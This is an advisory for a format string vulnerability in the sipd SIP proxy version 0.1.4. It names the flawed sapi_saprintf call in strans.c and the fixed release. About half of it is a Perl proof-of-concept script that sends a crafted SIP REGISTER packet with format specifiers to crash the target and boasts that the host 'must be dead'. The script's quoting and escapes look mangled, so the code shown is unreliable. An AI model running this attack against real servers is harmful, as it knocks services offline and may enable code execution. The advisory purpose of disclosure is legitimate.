‘sipD Format String Vulnerability’


sipd is ‘a high performance, scalable SIP (Session Initiation Protocol) proxy and location server written in C’. A format string vulnerability in the product allows remote attackers to cause the server to execute arbitrary code by providing it with a specially crafted SIP request.’


‘SecurITeam would like to thank STORM for finding this vulnerability. ‘


Vulnerable systems:
 * sipd version 0.1.4

Immune systems:
 * sipd version 0.1.5

Vulnerable code:
In strans/strans.c, line:
static inline u8_t *strans_hash_key_compat(const msg_t *req, bool_t cancel)

The program incorrectly calls sapi_saprintf without any parameters:
    /* Request URI */
    tmp = msg_url_str(req->request->url);
    sapi_saprintf(&hkey, tmp);

This means that a URI that includes format strings can cause the remote server to execute arbitrary code due to insufficient formatting being passed to the printf() function.

Upgrade to version 0.1.5, which is available at: http://www.sxdesign.com/index.php?page=developer&submnu=sipd.


# SIPd – SIP Password Format String
# Kills sipd version 0.1.4 and prior

use IO::Socket;
use strict;

unless (@ARGV == 2) { die ‘usage: $0 host your_ip [port]’ }

my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq ”)
 $port = ‘5060’;

my $buf = ‘REGISTER sip::%s%s%s%s%s%s%s%s%s%s%s%s%s%s@$remote_host SIP/2.0r
Via: SIP/2.0/UDP $your_host:3277r
From: ‘STORM’ <sip:$your_host:3277>r
To: <sip:$your_host:3277>r
Call-ID: 12312312@$your_hostr
Max-Forwards: 70r

my $socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error: $@n’;
my $ipaddr = inet_aton($remote_host) || $remote_host;
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die ‘Can’t send: $!n’;

print ‘Now, ‘$remote_host’ must be dead :)n’;’

Categories: UNIX